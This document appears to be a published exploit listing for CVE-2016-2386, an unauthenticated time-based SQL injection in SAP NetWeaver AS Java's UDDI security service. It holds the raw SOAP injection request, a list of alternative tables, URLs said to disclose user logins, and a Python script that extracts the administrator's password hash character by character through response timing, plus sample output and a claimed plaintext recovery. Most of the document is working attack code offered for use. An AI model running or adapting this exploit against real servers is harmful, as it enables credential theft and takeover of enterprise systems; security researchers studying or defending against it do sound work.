SAP NetWeaver J2EE Engine 7.40 SQL Injection

2018-01-1200:00:00
Vahagn Vardanyan
packetstormsecurity.com
0.332 Low
EPSS
Percentile
97.1%
JSON
`#!/usr/bin/env python  
# coding=utf-8  
"""  
Author: Vahagn Vardanyan https://twitter.com/vah_13  
  
Bugs:  
CVE-2016-2386 SQL injection  
CVE-2016-2388 Information disclosure  
CVE-2016-1910 Crypto issue  
  
  
  
Follow HTTP request is a simple PoC for anon time-based SQL injection (CVE-2016-2386) vulnerability in SAP NetWeaver AS Java UDDI 7.11-7.50  
  
POST /UDDISecurityService/UDDISecurityImplBean HTTP/1.1  
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0  
SOAPAction:  
Content-Type: text/xml;charset=UTF-8  
Host: nw74:50000  
Content-Length: 500  
  
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:sec="http://sap.com/esi/uddi/ejb/security/">  
<soapenv:Header/>  
<soapenv:Body>  
<sec:deletePermissionById>  
<permissionId>1' AND 1=(select COUNT(*) from J2EE_CONFIGENTRY, UME_STRINGS where UME_STRINGS.PID like '%PRIVATE_DATASOURCE.un:Administrator%' and UME_STRINGS.VAL like '%SHA-512%') AND '1'='1</permissionId>  
</sec:deletePermissionById>  
</soapenv:Body>  
</soapenv:Envelope>  
  
  
  
  
In SAP test server I have admin user who login is "Administrator" and so I used this payload  
  
%PRIVATE_DATASOURCE.un:Administrator%  
  
most SAP's using j2ee_admin username for SAP administrator login  
  
%PRIVATE_DATASOURCE.un:j2ee_admin%  
  
You can get all SAP users login using these URLs (CVE-2016-2388 - information disclosure)  
  
1) http:/SAP_IP:SAP_PORT/webdynpro/resources/sap.com/tc~rtc~coll.appl.rtc~wd_chat/Chat#  
2) http:/SAP_IP:SAP_PORT/webdynpro/resources/sap.com/tc~rtc~coll.appl.rtc~wd_chat/Messages#  
  
Instead of J2EE_CONFIGENTRY table you can use this tables  
  
UME_STRINGS_PERM  
UME_STRINGS_ACTN  
BC_DDDBDP  
BC_COMPVERS  
TC_WDRR_MRO_LUT  
TC_WDRR_MRO_FILES  
T_CHUNK !!! very big table, if SAP server will not response during 20 seconds then you have SQL injection  
T_DOMAIN  
T_SESSION  
UME_ACL_SUP_PERM  
UME_ACL_PERM  
UME_ACL_PERM_MEM  
  
  
An example of a working exploit  
  
C:\Python27\python.exe SQL_injection_CVE-2016-2386.py --host nw74 --port 50000  
start to retrieve data from the table UMS_STRINGS from nw74 server using CVE-2016-2386 exploit  
this may take a few minutes  
Found {SHA-512, 10000, 24}M  
Found {SHA-512, 10000, 24}MT  
Found {SHA-512, 10000, 24}MTI  
Found {SHA-512, 10000, 24}MTIz  
Found {SHA-512, 10000, 24}MTIzU  
Found {SHA-512, 10000, 24}MTIzUV  
Found {SHA-512, 10000, 24}MTIzUVd  
Found {SHA-512, 10000, 24}MTIzUVdF  
Found {SHA-512, 10000, 24}MTIzUVdFY  
Found {SHA-512, 10000, 24}MTIzUVdFYX  
Found {SHA-512, 10000, 24}MTIzUVdFYXN  
Found {SHA-512, 10000, 24}MTIzUVdFYXNk  
Found {SHA-512, 10000, 24}MTIzUVdFYXNk8  
Found {SHA-512, 10000, 24}MTIzUVdFYXNk88  
Found {SHA-512, 10000, 24}MTIzUVdFYXNk88F  
Found {SHA-512, 10000, 24}MTIzUVdFYXNk88Fx  
Found {SHA-512, 10000, 24}MTIzUVdFYXNk88Fxu  
Found {SHA-512, 10000, 24}MTIzUVdFYXNk88FxuY  
Found {SHA-512, 10000, 24}MTIzUVdFYXNk88FxuYC  
Found {SHA-512, 10000, 24}MTIzUVdFYXNk88FxuYC6  
Found {SHA-512, 10000, 24}MTIzUVdFYXNk88FxuYC6X  
  
  
And finaly using CVE-2016-1910 (Crypto issue) you can get administrator password in plain text  
  
base64_decode(MTIzUVdFYXNk88FxuYC6X)=123QWEasdA3AqA1AAoX  
  
"""  
import argparse  
import requests  
import string  
  
_magic = "{SHA-512, 10000, 24}"  
_wrong_magic = "{SHA-511, 10000, 24}"  
_xml = "<soapenv:Envelope xmlns:soapenv=\"http://schemas.xmlsoap.org/soap/envelope/\" " \  
"xmlns:sec=\"http://sap.com/esi/uddi/ejb/security/\">\r\n <soapenv:Header/>\r\n <soapenv:Body>\r\n " \  
"<sec:deletePermissionById>\r\n <permissionId>1' AND 1=(select COUNT(*) from J2EE_CONFIGENTRY, " \  
"UME_STRINGS where UME_STRINGS.PID like '%PRIVATE_DATASOURCE.un:Administrator%' and UME_STRINGS.VAL like '%{" \  
"0}%') AND '1'='1</permissionId>\r\n </sec:deletePermissionById>\r\n </soapenv:Body>\r\n</soapenv:Envelope> "  
host = ""  
port = 0  
_dictionary = string.digits + string.uppercase + string.lowercase  
  
def _get_timeout(_data):  
return requests.post("http://{0}:{1}/UDDISecurityService/UDDISecurityImplBean".format(host, port),  
headers={  
"User-Agent": "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:57.0) Gecko/20100101 "  
"Firefox/57.0",  
"SOAPAction": "",  
"Content-Type": "text/xml;charset=UTF-8"  
},  
data=_xml.format(_data)).elapsed.total_seconds()  
  
  
if __name__ == "__main__":  
parser = argparse.ArgumentParser()  
parser.add_argument('--host')  
parser.add_argument('--port')  
parser.add_argument('-v')  
  
args = parser.parse_args()  
args_dict = vars(args)  
  
host = args_dict['host']  
port = args_dict['port']  
  
print "start to retrieve data from the table UMS_STRINGS from {0} server using CVE-2016-2386 exploit ".format(host)  
_hash = _magic  
print "this may take a few minutes"  
for i in range(24): # you can change it if like to get full hash  
for _char in _dictionary:  
if not (args_dict['v'] is None):  
print "checking {0}".format(_hash + _char)  
if _get_timeout(_hash + _char) > 1.300: # timeout for local SAP server  
_hash += _char  
print "Found " + _hash  
break  
  
  
`